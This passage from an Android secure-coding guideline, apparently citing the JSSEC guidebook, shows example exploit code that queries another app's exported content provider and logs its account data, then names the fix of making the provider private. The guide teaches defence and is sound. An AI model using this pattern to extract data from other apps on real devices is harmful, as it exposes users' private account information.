...
The following code shows how this could be exploited:
| Code Block |
|---|
// check whether movatwi is installed.
try {
ApplicationInfo info = getPackageManager().getApplicationInfo("jp.co.vulnerable", 0);[cjl5]
} catch (NameNotFoundException e) {
Log.w(TAG, "the app is not installed.");
return;
}
// extract account data through content provider
Uri uri = Uri.parse("content://jp.co.vulnerable.accountprovider");
Cursor cur = getContentResolver().query(uri, null, null, null, null);[cjl6]
StringBuilder sb = new StringBuilder();
if (cur != null) {
int ri = 0;
while (cur.moveToNext()) {
++ri;
Log.i(TAG, String.format("row[%d]:", ri));
sb.setLength(0);
for (int i = 0; i < cur.getColumnCount(); ++i) {
String column = cur.getColumnName(i);
String value = cur.getString(i);
if (value != null) {
value = value.replaceAll("[\r\n]", "");
}
Log.i(TAG, String.format("\t%s:\t%s", column, value));
}
}
} else {
Log.i(TAG, "Can't get the app information.");
}
|
Compliant Solution
The following entry in the AndroidManifest.xml file makes the content provider private so that other apps cannot access the data:
...
Android Secure Coding Guidebook by JSSEC[cjl3] | 4.3. Creating/Using a Content Provider (2013/4/1 edition) |
Bibliography
Android Secure Coding Guidebook by JSSEC | 4.3. Creating/Using a Content Provider (2013/4/1 edition) |
...